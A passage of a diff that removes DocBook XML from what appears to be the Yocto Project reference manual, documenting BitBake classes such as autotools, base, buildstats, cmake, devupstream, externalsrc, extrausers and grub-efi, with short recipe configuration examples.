-            image for a different <filename>MACHINE</filename> is built
-            even when the recipe never changes.</para>
-        </note>
-    </para>
-
-    <para>
-        By default, all recipes inherit the
-        <link linkend='ref-classes-base'><filename>base</filename></link> and
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        classes, which enable functionality
-        needed for recipes that produce executable output.
-        If your recipe, for example, only produces packages that contain
-        configuration files, media files, or scripts (e.g. Python and Perl),
-        then it should inherit the <filename>allarch</filename> class.
-    </para>
-</section>
-
-<section id='ref-classes-archiver'>
-    <title><filename>archiver.bbclass</filename></title>
-
-    <para>
-        The <filename>archiver</filename> class supports releasing
-        source code and other materials with the binaries.
-    </para>
-
-    <para>
-        For more details on the source archiver, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-        You can also see the
-        <link linkend='var-ARCHIVER_MODE'><filename>ARCHIVER_MODE</filename></link>
-        variable for information about the variable flags (varflags)
-        that help control archive creation.
-    </para>
-</section>
-
-<section id='ref-classes-autotools'>
-    <title><filename>autotools*.bbclass</filename></title>
-
-    <para>
-        The <filename>autotools*</filename> classes support Autotooled
-        packages.
-    </para>
-
-    <para>
-        The <filename>autoconf</filename>, <filename>automake</filename>,
-        and <filename>libtool</filename> packages bring standardization.
-        This class defines a set of tasks (e.g.
-        <filename>configure</filename>, <filename>compile</filename> and
-        so forth) that
-        work for all Autotooled packages.
-        It should usually be enough to define a few standard variables
-        and then simply <filename>inherit autotools</filename>.
-        These classes can also work with software that emulates Autotools.
-        For more information, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-autotooled-package'>Autotooled Package</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        By default, the <filename>autotools*</filename> classes
-        use out-of-tree builds (i.e.
-        <filename>autotools.bbclass</filename> building with
-        <filename>B != S</filename>).
-    </para>
-
-    <para>
-        If the software being built by a recipe does not support
-        using out-of-tree builds, you should have the recipe inherit the
-        <filename>autotools-brokensep</filename> class.
-        The <filename>autotools-brokensep</filename> class behaves the same
-        as the <filename>autotools</filename> class but builds with
-        <link linkend='var-B'><filename>B</filename></link> ==
-        <link linkend='var-S'><filename>S</filename></link>.
-        This method is useful when out-of-tree build support is either not
-        present or is broken.
-        <note>
-            It is recommended that out-of-tree support be fixed and used
-            if at all possible.
-        </note>
-    </para>
-
-    <para>
-        It's useful to have some idea of how the tasks defined by
-        the <filename>autotools*</filename> classes work and what they do
-        behind the scenes.
-        <itemizedlist>
-            <listitem><para><link linkend='ref-tasks-configure'><filename>do_configure</filename></link> -
-                Regenerates the
-                configure script (using <filename>autoreconf</filename>) and
-                then launches it with a standard set of arguments used during
-                cross-compilation.
-                You can pass additional parameters to
-                <filename>configure</filename> through the
-                <filename><link linkend='var-EXTRA_OECONF'>EXTRA_OECONF</link></filename>
-                or
-                <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
-                variables.
-                </para></listitem>
-            <listitem><para><link linkend='ref-tasks-compile'><filename>do_compile</filename></link> -
-                Runs <filename>make</filename> with arguments that specify the
-                compiler and linker.
-                You can pass additional arguments through
-                the <filename><link linkend='var-EXTRA_OEMAKE'>EXTRA_OEMAKE</link></filename>
-                variable.
-                </para></listitem>
-            <listitem><para><link linkend='ref-tasks-install'><filename>do_install</filename></link> -
-                Runs <filename>make install</filename> and passes in
-                <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
-                as <filename>DESTDIR</filename>.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='ref-classes-base'>
-    <title><filename>base.bbclass</filename></title>
-
-    <para>
-        The <filename>base</filename> class is special in that every
-        <filename>.bb</filename> file implicitly inherits the class.
-        This class contains definitions for standard basic
-        tasks such as fetching, unpacking, configuring (empty by default),
-        compiling (runs any <filename>Makefile</filename> present), installing
-        (empty by default) and packaging (empty by default).
-        These classes are often overridden or extended by other classes
-        such as the
-        <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-        class or the
-        <link linkend='ref-classes-package'><filename>package</filename></link>
-        class.
-    </para>
-
-    <para>
-        The class also contains some commonly used functions such as
-        <filename>oe_runmake</filename>, which runs
-        <filename>make</filename> with the arguments specified in
-        <link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link>
-        variable as well as the arguments passed directly to
-        <filename>oe_runmake</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-bash-completion'>
-    <title><filename>bash-completion.bbclass</filename></title>
-
-    <para>
-        Sets up packaging and dependencies appropriate for recipes that
-        build software that includes bash-completion data.
-    </para>
-</section>
-
-<section id='ref-classes-bin-package'>
-    <title><filename>bin_package.bbclass</filename></title>
-
-    <para>
-        The <filename>bin_package</filename> class is a
-        helper class for recipes that extract the contents of a binary package
-        (e.g. an RPM) and install those contents rather than building the
-        binary from source.
-        The binary package is extracted and new packages in the configured
-        output package format are created.
-        Extraction and installation of proprietary binaries is a good example
-        use for this class.
-        <note>
-            For RPMs and other packages that do not contain a subdirectory,
-            you should specify an appropriate fetcher parameter to point to
-            the subdirectory.
-            For example, if BitBake is using the Git fetcher
-            (<filename>git://</filename>), the "subpath" parameter limits
-            the checkout to a specific subpath of the tree.
-            Here is an example where <filename>${BP}</filename> is used so that
-            the files are extracted into the subdirectory expected by the
-            default value of
-            <link linkend='var-S'><filename>S</filename></link>:
-            <literallayout class='monospaced'>
-     SRC_URI = "git://example.com/downloads/somepackage.rpm;subpath=${BP}"
-            </literallayout>
-            See the
-            "<ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>Fetchers</ulink>"
-            section in the BitBake User Manual for more information on
-            supported BitBake Fetchers.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-binconfig'>
-    <title><filename>binconfig.bbclass</filename></title>
-
-    <para>
-        The <filename>binconfig</filename> class helps to correct paths in
-        shell scripts.
-    </para>
-
-    <para>
-        Before <filename>pkg-config</filename> had become widespread, libraries
-        shipped shell scripts to give information about the libraries and
-        include paths needed to build software (usually named
-        <filename>LIBNAME-config</filename>).
-        This class assists any recipe using such scripts.
-    </para>
-
-    <para>
-        During staging, the OpenEmbedded build system installs such scripts
-        into the <filename>sysroots/</filename> directory.
-        Inheriting this class results in all paths in these scripts being
-        changed to point into the <filename>sysroots/</filename> directory so
-        that all builds that use the script use the correct directories
-        for the cross compiling layout.
-        See the
-        <link linkend='var-BINCONFIG_GLOB'><filename>BINCONFIG_GLOB</filename></link>
-        variable for more information.
-    </para>
-</section>
-
-<section id='ref-classes-binconfig-disabled'>
-    <title><filename>binconfig-disabled.bbclass</filename></title>
-
-    <para>
-        An alternative version of the
-        <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
-        class, which disables binary configuration scripts by making them
-        return an error in favor of using <filename>pkg-config</filename>
-        to query the information.
-        The scripts to be disabled should be specified using the
-        <link linkend='var-BINCONFIG'><filename>BINCONFIG</filename></link>
-        variable within the recipe inheriting the class.
-    </para>
-</section>
-
-<section id='ref-classes-blacklist'>
-    <title><filename>blacklist.bbclass</filename></title>
-
-    <para>
-        The <filename>blacklist</filename> class prevents
-        the OpenEmbedded build system from building specific recipes
-        (blacklists them).
-        To use this class, inherit the class globally and set
-        <link linkend='var-PNBLACKLIST'><filename>PNBLACKLIST</filename></link>
-        for each recipe you wish to blacklist.
-        Specify the <link linkend='var-PN'><filename>PN</filename></link>
-        value as a variable flag (varflag) and provide a reason, which is
-        reported, if the package is requested to be built as the value.
-        For example, if you want to blacklist a recipe called "exoticware",
-        you add the following to your <filename>local.conf</filename>
-        or distribution configuration:
-        <literallayout class='monospaced'>
-     INHERIT += "blacklist"
-     PNBLACKLIST[exoticware] = "Not supported by our organization."
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-buildhistory'>
-    <title><filename>buildhistory.bbclass</filename></title>
-
-    <para>
-        The <filename>buildhistory</filename> class records a
-        history of build output metadata, which can be used to detect possible
-        regressions as well as used for analysis of the build output.
-        For more information on using Build History, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-buildstats'>
-    <title><filename>buildstats.bbclass</filename></title>
-
-    <para>
-        The <filename>buildstats</filename> class records
-        performance statistics about each task executed during the build
-        (e.g. elapsed time, CPU usage, and I/O usage).
-    </para>
-
-    <para>
-        When you use this class, the output goes into the
-        <link linkend='var-BUILDSTATS_BASE'><filename>BUILDSTATS_BASE</filename></link>
-        directory, which defaults to <filename>${TMPDIR}/buildstats/</filename>.
-        You can analyze the elapsed time using
-        <filename>scripts/pybootchartgui/pybootchartgui.py</filename>, which
-        produces a cascading chart of the entire build process and can be
-        useful for highlighting bottlenecks.
-    </para>
-
-    <para>
-        Collecting build statistics is enabled by default through the
-        <link linkend='var-USER_CLASSES'><filename>USER_CLASSES</filename></link>
-        variable from your <filename>local.conf</filename> file.
-        Consequently, you do not have to do anything to enable the class.
-        However, if you want to disable the class, simply remove "buildstats"
-        from the <filename>USER_CLASSES</filename> list.
-    </para>
-</section>
-
-<section id='ref-classes-buildstats-summary'>
-    <title><filename>buildstats-summary.bbclass</filename></title>
-
-    <para>
-        When inherited globally, prints statistics at the end of the build
-        on sstate re-use.
-        In order to function, this class requires the
-        <link linkend='ref-classes-buildstats'><filename>buildstats</filename></link>
-        class be enabled.
-    </para>
-</section>
-
-<section id='ref-classes-ccache'>
-    <title><filename>ccache.bbclass</filename></title>
-
-    <para>
-        The <filename>ccache</filename> class enables the C/C++ Compiler Cache
-        for the build.
-        This class is used to give a minor performance boost during the build.
-        However, using the class can lead to unexpected side-effects.
-        Thus, it is recommended that you do not use this class.
-        See <ulink url='http://ccache.samba.org/'></ulink> for information on
-        the C/C++ Compiler Cache.
-    </para>
-</section>
-
-<section id='ref-classes-chrpath'>
-    <title><filename>chrpath.bbclass</filename></title>
-
-    <para>
-        The <filename>chrpath</filename> class
-        is a wrapper around the "chrpath" utility, which is used during the
-        build process for <filename>nativesdk</filename>,
-        <filename>cross</filename>, and
-        <filename>cross-canadian</filename> recipes to change
-        <filename>RPATH</filename> records within binaries in order to make
-        them relocatable.
-    </para>
-</section>
-
-<section id='ref-classes-clutter'>
-    <title><filename>clutter.bbclass</filename></title>
-
-    <para>
-        The <filename>clutter</filename> class consolidates the
-        major and minor version naming and other common items used by Clutter
-        and related recipes.
-        <note>
-            Unlike some other classes related to specific libraries, recipes
-            building other software that uses Clutter do not need to
-            inherit this class unless they use the same recipe versioning
-            scheme that the Clutter and related recipes do.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-cmake'>
-    <title><filename>cmake.bbclass</filename></title>
-
-    <para>
-        The <filename>cmake</filename> class allows for recipes that need to
-        build software using the
-        <ulink url='https://cmake.org/overview/'>CMake</ulink> build system.
-        You can use the
-        <link linkend='var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></link>
-        variable to specify additional configuration options to be passed
-        using the <filename>cmake</filename> command line.
-    </para>
-
-    <para>
-        On the occasion that you would be installing custom CMake toolchain
-        files supplied by the application being built, you should install them
-        to the preferred CMake Module directory:
-        <filename>${D}${datadir}/cmake/</filename> Modules during
-        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
-    </para>
-</section>
-
-<section id='ref-classes-cml1'>
-    <title><filename>cml1.bbclass</filename></title>
-
-    <para>
-        The <filename>cml1</filename> class provides basic support for the
-        Linux kernel style build configuration system.
-    </para>
-</section>
-
-<section id='ref-classes-compress_doc'>
-    <title><filename>compress_doc.bbclass</filename></title>
-
-    <para>
-        Enables compression for man pages and info pages.
-        This class is intended to be inherited globally.
-        The default compression mechanism is gz (gzip) but you can
-        select an alternative mechanism by setting the
-        <link linkend='var-DOC_COMPRESS'><filename>DOC_COMPRESS</filename></link>
-        variable.
-    </para>
-</section>
-
-<section id='ref-classes-copyleft_compliance'>
-    <title><filename>copyleft_compliance.bbclass</filename></title>
-
-    <para>
-        The <filename>copyleft_compliance</filename> class
-        preserves source code for the purposes of license compliance.
-        This class is an alternative to the <filename>archiver</filename>
-        class and is still used by some users even though it has been
-        deprecated in favor of the
-        <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-copyleft_filter'>
-    <title><filename>copyleft_filter.bbclass</filename></title>
-
-    <para>
-        A class used by the
-        <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
-        and
-        <link linkend='ref-classes-copyleft_compliance'><filename>copyleft_compliance</filename></link>
-        classes for filtering licenses.
-        The <filename>copyleft_filter</filename> class is an internal class
-        and is not intended to be used directly.
-    </para>
-</section>
-
-<section id='ref-classes-core-image'>
-    <title><filename>core-image.bbclass</filename></title>
-
-    <para>
-        The <filename>core-image</filename> class
-        provides common definitions for the
-        <filename>core-image-*</filename> image recipes, such as support for
-        additional
-        <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
-    </para>
-</section>
-
-<section id='ref-classes-cpan'>
-    <title><filename>cpan*.bbclass</filename></title>
-
-    <para>
-        The <filename>cpan*</filename> classes support Perl modules.
-    </para>
-
-    <para>
-        Recipes for Perl modules are simple.
-        These recipes usually only need to point to the source's archive and
-        then inherit the proper class file.
-        Building is split into two methods depending on which method the module
-        authors used.
-        <itemizedlist>
-            <listitem><para>Modules that use old
-                <filename>Makefile.PL</filename>-based build system require
-                <filename>cpan.bbclass</filename> in their recipes.
-                </para></listitem>
-            <listitem><para>Modules that use
-                <filename>Build.PL</filename>-based build system require
-                using <filename>cpan_build.bbclass</filename> in their recipes.
-                </para></listitem>
-        </itemizedlist>
-        Both build methods inherit the <filename>cpan-base</filename> class
-        for basic Perl support.
-    </para>
-</section>
-
-<section id='ref-classes-cross'>
-    <title><filename>cross.bbclass</filename></title>
-
-    <para>
-        The <filename>cross</filename> class provides support for the recipes
-        that build the cross-compilation tools.
-    </para>
-</section>
-
-<section id='ref-classes-cross-canadian'>
-    <title><filename>cross-canadian.bbclass</filename></title>
-
-    <para>
-        The <filename>cross-canadian</filename> class
-        provides support for the recipes that build the Canadian
-        Cross-compilation tools for SDKs.
-        See the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-        section in the Yocto Project Overview and Concepts Manual for more
-        discussion on these cross-compilation tools.
-    </para>
-</section>
-
-<section id='ref-classes-crosssdk'>
-    <title><filename>crosssdk.bbclass</filename></title>
-
-    <para>
-        The <filename>crosssdk</filename> class
-        provides support for the recipes that build the cross-compilation
-        tools used for building SDKs.
-        See the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
-        section in the Yocto Project Overview and Concepts Manual for more
-        discussion on these cross-compilation tools.
-    </para>
-</section>
-
-<section id='ref-classes-debian'>
-    <title><filename>debian.bbclass</filename></title>
-
-    <para>
-        The <filename>debian</filename> class renames output packages so that
-        they follow the Debian naming policy (i.e. <filename>glibc</filename>
-        becomes <filename>libc6</filename> and <filename>glibc-devel</filename>
-        becomes <filename>libc6-dev</filename>.)
-        Renaming includes the library name and version as part of the package
-        name.
-    </para>
-
-    <para>
-        If a recipe creates packages for multiple libraries
-        (shared object files of <filename>.so</filename> type), use the
-        <link linkend='var-LEAD_SONAME'><filename>LEAD_SONAME</filename></link>
-        variable in the recipe to specify the library on which to apply the
-        naming scheme.
-    </para>
-</section>
-
-<section id='ref-classes-deploy'>
-    <title><filename>deploy.bbclass</filename></title>
-
-    <para>
-        The <filename>deploy</filename> class handles deploying files
-        to the
-        <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
-        directory.
-        The main function of this class is to allow the deploy step to be
-        accelerated by shared state.
-        Recipes that inherit this class should define their own
-        <link linkend='ref-tasks-deploy'><filename>do_deploy</filename></link>
-        function to copy the files to be deployed to
-        <link linkend='var-DEPLOYDIR'><filename>DEPLOYDIR</filename></link>,
-        and use <filename>addtask</filename> to add the task at the appropriate
-        place, which is usually after
-        <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-        or
-        <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
-        The class then takes care of staging the files from
-        <filename>DEPLOYDIR</filename> to
-        <filename>DEPLOY_DIR_IMAGE</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-devshell'>
-    <title><filename>devshell.bbclass</filename></title>
-
-    <para>
-        The <filename>devshell</filename> class adds the
-        <filename>do_devshell</filename> task.
-        Distribution policy dictates whether to include this class.
-        See the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>" section
-        in the Yocto Project Development Tasks Manual for more information about
-        using <filename>devshell</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-devupstream'>
-    <title><filename>devupstream.bbclass</filename></title>
-
-    <para>
-        The <filename>devupstream</filename> class uses
-        <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
-        to add a variant of the recipe that fetches from an alternative URI
-        (e.g. Git) instead of a tarball.
-        Following is an example:
-        <literallayout class='monospaced'>
-     BBCLASSEXTEND = "devupstream:target"
-     SRC_URI_class-devupstream = "git://git.example.com/example"
-     SRCREV_class-devupstream = "abcd1234"
-        </literallayout>
-        Adding the above statements to your recipe creates a variant that has
-        <link linkend='var-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
-        set to "-1".
-        Consequently, you need to select the variant of the recipe to use it.
-        Any development-specific adjustments can be done by using the
-        <filename>class-devupstream</filename> override.
-        Here is an example:
-        <literallayout class='monospaced'>
-     DEPENDS_append_class-devupstream = " gperf-native"
-
-     do_configure_prepend_class-devupstream() {
-        touch ${S}/README
-     }
-        </literallayout>
-        The class currently only supports creating a development variant of
-        the target recipe, not <filename>native</filename> or
-        <filename>nativesdk</filename> variants.
-    </para>
-
-    <para>
-        The <filename>BBCLASSEXTEND</filename> syntax
-        (i.e. <filename>devupstream:target</filename>) provides support for
-        <filename>native</filename> and <filename>nativesdk</filename>
-        variants.
-        Consequently, this functionality can be added in a future release.
-    </para>
-
-    <para>
-        Support for other version control systems such as Subversion is
-        limited due to BitBake's automatic fetch dependencies (e.g.
-        <filename>subversion-native</filename>).
-    </para>
-</section>
-
-<section id='ref-classes-distro_features_check'>
-    <title><filename>distro_features_check.bbclass</filename></title>
-
-    <para>
-        The <filename>distro_features_check</filename> class
-        allows individual recipes to check for required and conflicting
-        <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
-    </para>
-
-    <para>
-        This class provides support for the
-        <link linkend='var-REQUIRED_DISTRO_FEATURES'><filename>REQUIRED_DISTRO_FEATURES</filename></link>
-        and
-        <link linkend='var-CONFLICT_DISTRO_FEATURES'><filename>CONFLICT_DISTRO_FEATURES</filename></link>
-        variables.
-        If any conditions specified in the recipe using the above variables are
-        not met, the recipe will be skipped.
-    </para>
-</section>
-
-<section id='ref-classes-distutils'>
-    <title><filename>distutils*.bbclass</filename></title>
-
-    <para>
-        The <filename>distutils*</filename> classes support recipes for Python
-        version 2.x extensions, which are simple.
-        These recipes usually only need to point to the source's archive and
-        then inherit the proper class.
-        Building is split into two methods depending on which method the
-        module authors used.
-        <itemizedlist>
-            <listitem><para>Extensions that use an Autotools-based build system
-                require Autotools and the classes based on
-                <filename>distutils</filename> in their recipes.
-                </para></listitem>
-            <listitem><para>Extensions that use build systems based on
-                <filename>distutils</filename> require
-                the <filename>distutils</filename> class in their recipes.
-                </para></listitem>
-            <listitem><para>Extensions that use build systems based on
-                <filename>setuptools</filename> require the
-                <link linkend='ref-classes-setuptools'><filename>setuptools</filename></link>
-                class in their recipes.
-                </para></listitem>
-        </itemizedlist>
-        The <filename>distutils-common-base</filename> class is required by
-        some of the <filename>distutils*</filename> classes to provide common
-        Python2 support.
-    </para>
-</section>
-
-<section id='ref-classes-distutils3'>
-    <title><filename>distutils3*.bbclass</filename></title>
-
-    <para>
-        The <filename>distutils3*</filename> classes support recipes for Python
-        version 3.x extensions, which are simple.
-        These recipes usually only need to point to the source's archive and
-        then inherit the proper class.
-        Building is split into three methods depending on which method the
-        module authors used.
-        <itemizedlist>
-            <listitem><para>Extensions that use an Autotools-based build system
-                require Autotools and
-                <filename>distutils</filename>-based classes in their recipes.
-                </para></listitem>
-            <listitem><para>Extensions that use
-                <filename>distutils</filename>-based build systems require
-                the <filename>distutils</filename> class in their recipes.
-                </para></listitem>
-            <listitem><para>Extensions that use build systems based on
-                <filename>setuptools3</filename> require the
-                <link linkend='ref-classes-setuptools'><filename>setuptools3</filename></link>
-                class in their recipes.
-                </para></listitem>
-        </itemizedlist>
-        The <filename>distutils3*</filename> classes either inherit their
-        corresponding <filename>distutils*</filename> class or replicate them
-        using a Python3 version instead (e.g.
-        <filename>distutils3-base</filename> inherits
-        <filename>distutils-common-base</filename>, which is the same as
-        <filename>distutils-base</filename> but inherits
-        <filename>python3native</filename> instead of
-        <filename>pythonnative</filename>).
-    </para>
-</section>
-
-<section id='ref-classes-externalsrc'>
-    <title><filename>externalsrc.bbclass</filename></title>
-
-    <para>
-        The <filename>externalsrc</filename> class supports building software
-        from source code that is external to the OpenEmbedded build system.
-        Building software from an external source tree means that the build
-        system's normal fetch, unpack, and patch process is not used.
-    </para>
-
-    <para>
-        By default, the OpenEmbedded build system uses the
-        <link linkend='var-S'><filename>S</filename></link> and
-        <link linkend='var-B'><filename>B</filename></link> variables to
-        locate unpacked recipe source code and to build it, respectively.
-        When your recipe inherits the <filename>externalsrc</filename> class,
-        you use the
-        <link linkend='var-EXTERNALSRC'><filename>EXTERNALSRC</filename></link>
-        and
-        <link linkend='var-EXTERNALSRC_BUILD'><filename>EXTERNALSRC_BUILD</filename></link>
-        variables to ultimately define <filename>S</filename> and
-        <filename>B</filename>.
-    </para>
-
-    <para>
-        By default, this class expects the source code to support recipe builds
-        that use the <link linkend='var-B'><filename>B</filename></link>
-        variable to point to the directory in which the OpenEmbedded build
-        system places the generated objects built from the recipes.
-        By default, the <filename>B</filename> directory is set to the
-        following, which is separate from the source directory
-        (<filename>S</filename>):
-        <literallayout class='monospaced'>
-     ${WORKDIR}/${BPN}/{PV}/
-        </literallayout>
-        See these variables for more information:
-        <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>,
-        <link linkend='var-BPN'><filename>BPN</filename></link>, and
-        <link linkend='var-PV'><filename>PV</filename></link>,
-    </para>
-
-    <para>
-        For more information on the
-        <filename>externalsrc</filename> class, see the comments in
-        <filename>meta/classes/externalsrc.bbclass</filename> in the
-        <link linkend='source-directory'>Source Directory</link>.
-        For information on how to use the <filename>externalsrc</filename>
-        class, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#building-software-from-an-external-source'>Building Software from an External Source</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='ref-classes-extrausers'>
-    <title><filename>extrausers.bbclass</filename></title>
-
-    <para>
-        The <filename>extrausers</filename> class allows
-        additional user and group configuration to be applied at the image
-        level.
-        Inheriting this class either globally or from an image recipe allows
-        additional user and group operations to be performed using the
-        <link linkend='var-EXTRA_USERS_PARAMS'><filename>EXTRA_USERS_PARAMS</filename></link>
-        variable.
-        <note>
-            The user and group operations added using the
-            <filename>extrausers</filename> class are not tied to a specific
-            recipe outside of the recipe for the image.
-            Thus, the operations can be performed across the image as a whole.
-            Use the
-            <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-            class to add user and group configuration to a specific recipe.
-        </note>
-        Here is an example that uses this class in an image recipe:
-        <literallayout class='monospaced'>
-     inherit extrausers
-     EXTRA_USERS_PARAMS = "\
-         useradd -p '' tester; \
-         groupadd developers; \
-         userdel nobody; \
-         groupdel -g video; \
-         groupmod -g 1020 developers; \
-         usermod -s /bin/sh tester; \
-         "
-        </literallayout>
-        Here is an example that adds two users named "tester-jim" and
-        "tester-sue" and assigns passwords:
-        <literallayout class='monospaced'>
-     inherit extrausers
-     EXTRA_USERS_PARAMS = "\
-         useradd -P tester01 tester-jim; \
-         useradd -P tester01 tester-sue; \
-         "
-        </literallayout>
-        Finally, here is an example that sets the root password to
-        "1876*18":
-        <literallayout class='monospaced'>
-     inherit extrausers
-     EXTRA_USERS_PARAMS = "\
-         usermod -P 1876*18 root; \
-         "
-        </literallayout>
-    </para>
-</section>
-
-<section id='ref-classes-fontcache'>
-    <title><filename>fontcache.bbclass</filename></title>
-
-    <para>
-        The <filename>fontcache</filename> class generates the
-        proper post-install and post-remove (postinst and postrm)
-        scriptlets for font packages.
-        These scriptlets call <filename>fc-cache</filename> (part of
-        <filename>Fontconfig</filename>) to add the fonts to the font
-        information cache.
-        Since the cache files are architecture-specific,
-        <filename>fc-cache</filename> runs using QEMU if the postinst
-        scriptlets need to be run on the build host during image creation.
-    </para>
-
-    <para>
-        If the fonts being installed are in packages other than the main
-        package, set
-        <link linkend='var-FONT_PACKAGES'><filename>FONT_PACKAGES</filename></link>
-        to specify the packages containing the fonts.
-    </para>
-</section>
-
-<section id='ref-classes-fs-uuid'>
-    <title><filename>fs-uuid.bbclass</filename></title>
-
-    <para>
-        The <filename>fs-uuid</filename> class extracts UUID from
-        <filename>${</filename><link linkend='var-ROOTFS'><filename>ROOTFS</filename></link><filename>}</filename>,
-        which must have been built by the time that this function gets called.
-        The <filename>fs-uuid</filename> class only works on
-        <filename>ext</filename> file systems and depends on
-        <filename>tune2fs</filename>.
-    </para>
-</section>
-
-<section id='ref-classes-gconf'>
-    <title><filename>gconf.bbclass</filename></title>
-
-    <para>
-        The <filename>gconf</filename> class provides common
-        functionality for recipes that need to install GConf schemas.
-        The schemas will be put into a separate package
-        (<filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-gconf</filename>)
-        that is created automatically when this class is inherited.
-        This package uses the appropriate post-install and post-remove
-        (postinst/postrm) scriptlets to register and unregister the schemas
-        in the target image.
-    </para>
-</section>
-
-<section id='ref-classes-gettext'>
-    <title><filename>gettext.bbclass</filename></title>
-
-    <para>
-        The <filename>gettext</filename> class provides support for
-        building software that uses the GNU <filename>gettext</filename>
-        internationalization and localization system.
-        All recipes building software that use
-        <filename>gettext</filename> should inherit this class.
-    </para>
-</section>
-
-<section id='ref-classes-gnomebase'>
-    <title><filename>gnomebase.bbclass</filename></title>
-
-    <para>
-        The <filename>gnomebase</filename> class is the base
-        class for recipes that build software from the GNOME stack.
-        This class sets
-        <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link> to
-        download the source from the GNOME mirrors as well as extending
-        <link linkend='var-FILES'><filename>FILES</filename></link>
-        with the typical GNOME installation paths.
-    </para>
-</section>
-
-<section id='ref-classes-gobject-introspection'>
-    <title><filename>gobject-introspection.bbclass</filename></title>
-
-    <para>
-        Provides support for recipes building software that
-        supports GObject introspection.
-        This functionality is only enabled if the
-        "gobject-introspection-data" feature is in
-        <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-        as well as "qemu-usermode" being in
-        <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>.
-        <note>
-            This functionality is backfilled by default and,
-            if not applicable, should be disabled through
-            <link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></link>
-            or
-            <link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></link>,
-            respectively.
-        </note>
-    </para>
-</section>
-
-<section id='ref-classes-grub-efi'>
-    <title><filename>grub-efi.bbclass</filename></title>
-
-    <para>
-        The <filename>grub-efi</filename>
-        class provides <filename>grub-efi</filename>-specific functions for
-        building bootable images.
-    </para>
-
-    <para>
-        This class supports several variables:
-        <itemizedlist>
-            <listitem><para>
-                <link linkend='var-INITRD'><filename>INITRD</filename></link>:
-                Indicates list of filesystem images to concatenate and use
-                as an initial RAM disk (initrd) (optional).
-                </para></listitem>
-            <listitem><para>
-                <link linkend='var-ROOTFS'><filename>ROOTFS</filename></link>:
-                Indicates a filesystem image to include as the root filesystem
-                (optional).</para></listitem>
-            <listitem><para>
-                <link linkend='var-GRUB_GFXSERIAL'><filename>GRUB_GFXSERIAL</filename></link>:
-                Set this to "1" to have graphics and serial in the boot menu.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='var-LABELS'><filename>LABELS</filename></link>:
-                A list of targets for the automatic configuration.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='var-APPEND'><filename>APPEND</filename></link>:
-                An override list of append strings for each
-                <filename>LABEL</filename>.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='var-GRUB_OPTS'><filename>GRUB_OPTS</filename></link>:
-                Additional options to add to the configuration (optional).
-                Options are delimited using semi-colon characters
-                (<filename>;</filename>).</para></listitem>
-            <listitem><para>
-                <link linkend='var-GRUB_TIMEOUT'><filename>GRUB_TIMEOUT</filename></link>:
-                Timeout before executing the default <filename>LABEL</filename>
-                (optional).
-                </para></listitem>
-       </itemizedlist>
-   </para>
-</section>
-
-<section id='ref-classes-gsettings'>
-    <title><filename>gsettings.bbclass</filename></title>
-
-    <para>
-        The <filename>gsettings</filename> class
-        provides common functionality for recipes that need to install
-        GSettings (glib) schemas.
-        The schemas are assumed to be part of the main package.
-        Appropriate post-install and post-remove (postinst/postrm)
-        scriptlets are added to register and unregister the schemas in the
-        target image.
-    </para>
-</section>
-
